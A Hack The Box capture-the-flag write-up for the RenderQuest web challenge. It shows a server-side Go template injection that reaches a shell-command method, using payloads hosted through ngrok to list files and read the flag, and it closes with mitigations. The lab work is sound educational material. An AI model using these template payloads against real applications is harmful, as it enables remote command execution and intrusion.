Hack The Box - Web | RenderQuest | Writeup


 Hack The Box: RenderQuest


 

Reconnaissance

Upon initial inspection, we are presented with a webpage that renders .tpl template files, either locally or remotely. After reviewing the Go source code provided, we discover two main functions that are of interest.

First, there is a snippet of code that renders files locally or remotely:

if remote == "true" {
    tmplFile, err = readRemoteFile(page)
    if err != nil {
        http.Error(w, "Internal Server Error", http.StatusInternalServerError)
        return
    }
} else {
    tmplFile, err = readFile(TEMPLATE_DIR+"/"+page, "./")
    if err != nil {
        http.Error(w, "Internal Server Error", http.StatusInternalServerError)
        return
    }
}

Additionally, we find a method that executes system commands:

func (p RequestData) FetchServerInfo(command string) string {
    out, err := exec.Command("sh", "-c", command).Output()
    if err != nil {
        return ""
    }
    return string(out)
}

Foothold

With the Go templating engine in play and the system command execution function (FetchServerInfo), we know that we can craft templates to exploit this behavior.

To confirm the templating engine, we try basic Go template payloads:

  • {{ . }} - This leaks the structure of the passed data.
  • {{ printf "%s" "text" }} - You can print text with this method.

By leveraging the FetchServerInfo method, we can execute system commands directly. We create a template file to execute ls -lah and retrieve the server directory:

Create the Exploit Template

$ cat exploit.tpl 
{{.FetchServerInfo "ls -lah"}}

We then serve this template file locally by starting a Python server in the directory containing the exploit.tpl file:

$ python3 -m http.server 80

Since we need to access this file remotely, we use ngrok to expose our local server:

$ ngrok http 80

This provides us with a public URL, e.g., https://<ngrok_url>/exploit.tpl.

Exploitation

Next, we send a GET request to the vulnerable web application to fetch our remote template and execute the command on the server:

GET Request:

GET /render?use_remote=true&page=https://<ngrok_url>/exploit.tpl HTTP/1.1
Host: 206.189.24.162:30304

In response, we get the directory listing from the server, revealing the presence of the flag:

-rw-r--r--    1 root     root          40 Sep 12 08:50 flag5e**XXXX**f2a.txt

Reading the Flag

Now, we modify our template to read the contents of the flag file:

$ cat read_flag.tpl
{{.FetchServerInfo "cat /flag5e**XXXX**f2a.txt"}}

We serve this new template and send another GET request to fetch the flag:

GET /render?use_remote=true&page=https://<ngrok_url>/read_flag.tpl HTTP/1.1
Host: 206.189.24.162:30304

The response contains the flag:

HTB{qu35t_**REDACTED**_t3mpl4t35!!}

Mitigations

  • Secure Execution of System Commands: Avoid using shell commands directly in the application. Instead, use safer functions to handle command execution or sanitize inputs to prevent command injection attacks.
  • Limit Remote Template Execution: Restrict the execution of remote templates to trusted, predefined sources. Implement an allowlist to avoid loading potentially malicious templates.
  • Isolate the Execution Environment: Run the web application in a sandboxed or containerized environment. This limits the potential damage from successful exploitation.

Comments

Post a Comment

Popular Posts